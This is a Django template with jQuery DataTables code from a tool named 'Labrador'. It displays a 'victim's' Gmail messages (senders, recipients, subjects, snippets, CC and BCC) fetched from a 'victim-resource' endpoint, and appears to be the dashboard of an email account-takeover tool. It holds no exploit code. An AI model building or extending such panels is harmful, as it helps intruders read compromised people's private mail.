{% extends "_partial.html" %}
{% load victim_custom_tag %}
{% block site_title %} Labrador | Resource of {{victim.email}} {% endblock %}
{% block content %}

<style type="text/css">
    tr.shown td.details-control span{
        
        color:#FF0000; 
        font-size: 20px; 
               
    }

    td.details-control span{
       
        color:#009900; 
        font-size: 20px; 
        cursor: pointer;
        
    }
</style>

<h1>Gmail resources of <strong>"{{victim.email}}"</strong></h1>
<table id="gmail-resource" class="table table-striped">
    <thead>
        <tr>
            <th></th>
            <th>From</th>
            <th>To</th>
            <th>Subject</th>
            <th>Snipped</th>
            <th>Sent date</th>
            <th>Actions</th>
        </tr>
    </thead>
    <tbody>
        {% for resource in resources %}
        <tr>
            <td></td>
            <td>{{resource.message_from}}</td>
            <td>{{resource.message_to|join:','}}</td>
            <td>{{resource.subject}}</td>
            <td>{{resource.snippet}}</td>
            <td>{{resource.sent_date|unixtime_to_human}}</td>
            <td>
                Action
            </td>
        </tr>
        {% endfor %}
    </tbody>
</table>
<script>
    $.ajaxSetup({
        beforeSend: function(xhr, settings) {
            if (!csrfSafeMethod(settings.type) && !this.crossDomain) {
                xhr.setRequestHeader("X-CSRFToken", csrftoken);
            }
        }
    });

    /* Formatting function for row details - modify as you need */
    function reformat ( d ) {
        // `d` is the original data object for the row
        return '<table cellpadding="5" cellspacing="0" border="0" style="padding-left:50px;">'+
            '<tr>'+
                '<td>CC:</td>'+
                '<td>'+d.cc+'</td>'+
            '</tr>'+
            '<tr>'+
                '<td>BCC:</td>'+
                '<td>'+d.bcc+'</td>'+
            '</tr>'+            
        '</table>';
    }    
    
    $(document).ready(function(){

        /**
            Data format:
            0: message_from From
            1: message_to To
            2: message_cc CC
            3: message_bcc BCC
            4: subject Subject
            5: snippet Snippet (A short head of body)
            6: sent_date Sent date
        **/
            
        var gmail_table = $('#gmail-resource').DataTable({
            ordering: false,
            searching: false,
            serverSide : true,
            ajax: {
                url: '{% url 'victim-resource' service.slug victim.email|base64_encode %}',
                type: 'POST',                
            },
            columns: [
                {
                    "className":      'details-control',
                    "orderable":      false,
                    "data":           '',
                    "defaultContent": '<span class="glyphicon glyphicon-plus-sign"></span>'
                },
                { data: 'from' },
                { data: 'to' },
                { data: 'subject' },
                { data: 'snippet' },
                { data: 'sent_date' },
                { data: 'action' },
                
            ],
        });

        // Add event listener for opening and closing details
        $('#gmail-resource tbody').on('click', 'td.details-control', function () {
            var tr = $(this).closest('tr');
            var row = gmail_table.row( tr );
            
            if ( row.child.isShown() ) {
                // This row is already open - close it
                row.child.hide();
                tr.removeClass('shown');
                $('span', this).removeClass('glyphicon-minus-sign').addClass('glyphicon-plus-sign')
            }
            else {
                // Open this row
                row.child( reformat(row.data()) ).show();
                tr.addClass('shown');
                $('span', this).addClass('glyphicon-minus-sign').removeClass('glyphicon-plus-sign')
            }
        } );        
        
    });
</script>

{% endblock %}
